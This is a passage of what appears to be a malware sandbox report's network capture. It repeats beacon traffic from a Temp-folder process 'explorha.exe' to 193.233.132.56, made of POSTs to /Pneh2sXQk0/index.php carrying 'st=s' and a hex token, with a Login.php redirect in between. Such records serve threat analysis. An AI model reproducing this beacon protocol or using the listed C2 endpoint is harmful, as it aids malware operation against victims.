                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:28.061599016 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    30 | 192.168.2.4 | 49766 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:28.421542883 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:28.665414095 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:28 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:28.666110992 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:28.916958094 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:28 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    31 | 192.168.2.4 | 49767 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:29.261404037 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:29.503365993 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:29.504183054 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:29.750348091 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    32 | 192.168.2.4 | 49768 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:30.112767935 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:30.361001968 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:30 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:30.361669064 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:30.614500046 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:30 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    33 | 192.168.2.4 | 49769 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:30.967915058 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:31.212212086 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:31.212990999 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:31.461462975 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    34 | 192.168.2.4 | 49770 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:31.812819958 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:32.059587955 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:32.060372114 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:32.311256886 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    35 | 192.168.2.4 | 49771 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:32.669044971 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:32.912678957 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:32.913467884 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:33.170676947 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:33 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49772 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:33.527873039 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:33.770442009 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:33 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:33.771461010 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:34.018942118 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:33 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49773 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:34.373291016 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:34.617108107 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:34 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:34.618045092 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:34.867587090 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:34 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49774 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:35.216742039 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:35.460585117 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:35 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:35.461343050 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:35.709454060 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:35 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49775 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:36.066735983 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:36.315598965 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:36 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:36.316288948 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:36.570569992 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:36 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49776 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:37.712682962 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
